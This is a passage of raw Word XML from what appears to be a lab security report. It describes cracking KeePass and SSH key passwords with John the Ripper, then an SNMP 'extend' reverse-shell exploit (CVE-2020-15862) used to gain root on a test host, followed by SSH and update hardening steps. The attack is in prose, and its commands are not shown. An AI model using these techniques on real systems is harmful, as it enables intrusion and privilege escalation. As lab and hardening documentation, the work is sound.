          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Keep2john to convert the hash into a crackable format to be used by John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start to brute force using John the Ripper and the rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the cracked master password to access secret.kdbx using Keepass.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract the SSH private key of the dev user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use ssh2john to convert the hash into a crackable format </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use John and rockyou.txt to crack the password again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 9: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the dev SSH private key to access the host machine as a dev user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ee8lgnnsxd9" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SNMP RCE involves making use of the “Extend” functionality that SNMP offers. This functionality allows a user to run code on SNMP as the service account, which can be manipulated to connect to an attacker via reverse shell to achieve privilege escalation. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_g6o3snghawux">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">3.8. - SNMP Remote Code Execution (RCE)</w:t>
        </w:r>
      </w:hyperlink>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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> An example of running a basic script that queries for the current running service account for SNMP is shown as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then, we can enter the configuration file for SNMP to put the following string in at the end of the file, in the format as shown in red:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> From here, the user has to restart the service to apply the new configurations. To allow for the “dev” user to restart the SNMP service, the following configuration is set in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> After restarting, to run the script, we enter the following command, which will return the output as shown in blue below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> With this functionality, an attacker can make use of this functionality to connect remotely through a reverse shell as documented in CVE-2020-15862. To perform this reverse shell exploit, we enter the following entry into the configuration file, making use of the “extend” function to execute the said script. In this instance, my Kali Linux machine has an IP address of 34.67.120.91, and I choose a random port number to do a reverse shell connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After the snmpwalk command is run, output messages are shown on the EC2 instance and the Kali Linux machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">depicting a successful execution of the command and obtaining of the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this reverse shell, an attacker would now have write access to the Debian-snmp user’s home directory of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/snmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. As the service account has to write permissions to this directory, through this reverse shell, an attacker can write a local configuration file within the system, which will allow the SNMP service to run as root. Figure XX shows the steps taken to achieve this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> With this script written, the attacker can exit from this reverse TCP shell, and restart the SNMP service before reconnecting once again to the Kali Linux machine. This will cause the target machine to reload the configuration files, and have this new file be applied to the SNMP service configuration. After reconnection, the attacker will have successfully escalated his privilege to root on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_syx326lf4n49" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Hardening steps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_86cdw2ve0zn1" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuring SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The use of SSH key-based authentication for remote administration is a best practice in securing remote access to systems and servers.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable password-based SSH login and the root account for SSH access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="3657600" cy="585216"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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657600" cy="585216"/>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0" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t9tcha59mjyb" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2. Update Software</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All packages are updated to their latest version to prevent any known vulnerabilities from being exploited. Unused packages are also removed to reduce the attack surface for attackers to exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_6u7dpw5wpz58">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">4.2. Update Software</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
